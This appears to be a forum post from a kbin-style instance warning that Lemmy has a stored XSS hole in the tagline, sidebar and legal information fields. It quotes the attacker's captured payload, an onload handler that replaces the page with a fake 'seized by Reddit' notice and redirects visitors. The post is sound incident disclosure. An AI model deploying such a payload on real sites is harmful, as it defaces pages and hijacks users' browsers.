(URGENT) Lemmy has an XSS vulnerability in the tagline, the sidebar and in the legal information field

DO NOT OPEN THE “LEGAL” PAGE

lemmy.world is a victim of an XSS attack right now and the hacker simply injected a JavaScript redirection into the sidebar.

It appears the Lemmy backend does not escape HTML in the main sidebar. Not sure if this is also true for community sidebars.

https://sh.itjust.works/pictrs/image/707c0f16-3d5c-4888-b865-34228d968ee6.png

EDIT:

the exploit is also in the tagline that appears on top of the main feed for status updates, like the following one for SDF Chatter:

https://sh.itjust.works/pictrs/image/2dc8838f-4611-4b62-92d2-ab45d7b1c560.png

https://sh.itjust.works/pictrs/image/9195ec9c-166e-4190-a991-26d218089602.png

EDIT 2:

The legal information field also has that exploit, so that when you go to the “Legal” page it shows the HTML unescaped, but fortunately (for now) he’s using double-quotes.


<span style="color:#323232;">"legal_information":" ![" onload="if(localStorage.getItem(`h`) != `true`){document.body.innerHTML = `u003Ch1u003ESite has been seized by Reddit for copyright infringmentu003Cu002Fh1u003E`; setTimeout(() =u003E {window.location.href = `https:u002Fu002Flemmy.worldu002Fpictrsu002Fimageu002F7aa772b7-9416-45d1-805b-36ec21be9f66.mp4`}, 10000)}"](https:u002Fu002Flemmy.worldu002Fpictrsu002Fimageu002F66ca36df-4ada-47b3-9169-01870d8fb0ac.png "lw")
</span>
  • All
  • Subscribed
  • Moderated
  • Favorites
  • random
  • wartaberita
  • uselessserver093
  • Food
  • aaaaaaacccccccce
  • [email protected]
  • test
  • CafeMeta
  • testmag
  • MUD
  • RhythmGameZone
  • RSS
  • dabs
  • TheResearchGuardian
  • Ask_kbincafe
  • KbinCafe
  • Testmaggi
  • Socialism
  • feritale
  • oklahoma
  • SuperSentai
  • KamenRider
  • All magazines
    •